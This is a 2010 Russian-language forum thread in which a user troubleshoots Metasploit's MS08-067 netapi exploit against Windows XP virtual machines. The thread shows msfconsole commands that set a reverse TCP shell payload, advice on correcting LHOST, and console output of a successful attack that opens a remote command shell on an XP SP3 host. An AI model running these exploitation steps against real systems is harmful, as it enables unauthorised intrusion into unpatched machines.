Metasploit (Ubuntu) не могу найти MS08-067_netapi

Discussion in 'Песочница' started by Ru}{eeZ, 7 Jun 2010.

  1. Ru}{eeZ

    Ru}{eeZ Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    454
    Likes Received:
    73
    Reputations:
    -5
    Собрал из исходников метасплоит на убунте, ввожу в консоль (msfconsole) выбор эксплоита, но почему-то он не находится, в чём дело? Ведь он есть в /msf3/modules/exploits/windows/smb/
    Code:
    msf > use MS08-067_netapi
    [-] Failed to load module: MS08-067_netapi
    
    НОВЫЙ ВОПРОС НИЖЕ!
     
    #1 Ru}{eeZ, 7 Jun 2010
    Last edited: 7 Jun 2010
  2. rap1t

    rap1t Member

    Joined:
    6 Jan 2009
    Messages:
    77
    Likes Received:
    32
    Reputations:
    1
    ты сам ответил на свой вопрос
    Code:
    use exploit/windows/smb/ms08_067_netapi
     
    3 people like this.
  3. Ru}{eeZ

    Ru}{eeZ Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    454
    Likes Received:
    73
    Reputations:
    -5
    спасибо большое! а я пробовал полный путь указывать)
     
  4. Ru}{eeZ

    Ru}{eeZ Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    454
    Likes Received:
    73
    Reputations:
    -5
    Новый вопрос:
    Почему я не могу получить доступ к системе (поставил на вирт. машину голый Windows XP SP2 RU)? На ней нет никаких заплаток.
    Code:
    [*] Started reverse handler on 127.0.0.1:4444 
    
    [*] Automatically detecting the target...
    
    [*] Fingerprint: Windows XP Service Pack 2 - lang:Russian
    
    [*] Selected Target: Windows XP SP2 Russian (NX)
    
    [*] Attempting to trigger the vulnerability...
    
    [*] Exploit completed, but no session was created.
    
    До этого:
    Code:
    msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_reverse_tcp
    PAYLOAD => generic/shell_reverse_tcp
    
    msf exploit(ms08_067_netapi) > set RHOST 172.31.34.250
    RHOST => 172.31.34.250
    
    msf exploit(ms08_067_netapi) > set LHOST 127.0.0.1
    LHOST => 127.0.0.1
    
     
    #4 Ru}{eeZ, 7 Jun 2010
    Last edited: 7 Jun 2010
  5. overxor

    overxor Member

    Joined:
    11 Sep 2009
    Messages:
    32
    Likes Received:
    9
    Reputations:
    0
    >> LHOST => 127.0.0.1
    После пробива у тебя идет попытка соединения на локальный интерфейс.

    Измени на ip адрес совей Ubunt'ы
     
    1 person likes this.
  6. Ru}{eeZ

    Ru}{eeZ Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    454
    Likes Received:
    73
    Reputations:
    -5
    Спасибо, теперь получилось)

    Только вот не могу понят, пробую атаковать голую без заплаток и с выключенным брандмауэром свою XP SP2 на виртуалке, выдаёт:
    Code:
    msf exploit(ms08_067_netapi) > exploit
    
    [*] Started reverse handler on 172.31.47.208:4444 
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 2 - lang:Russian
    [*] Selected Target: Windows XP SP2 Russian (NX)
    [*] Attempting to trigger the vulnerability...
    [*] Exploit completed, but no session was created.
    
    
    Атакую юзаемый Windows XP SP3 - атака проходит:
    Code:
    [*] Started reverse handler on 172.31.47.208:4444 
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 3 - lang:Russian
    [*] Selected Target: Windows XP SP3 Russian (NX)
    [*] Attempting to trigger the vulnerability...
    [*] Command shell session 1 opened (172.31.47.208:4444 -> 172.31.47.196:2658) at Mon Jun 07 14:39:12 +0400 2010
    
    Microsoft Windows XP [������ 5.1.2600]
    (�) ��௮����� ����������, 1985-2001.
    
    C:\WINDOWS\system32>
    
    
    Почему так может быть?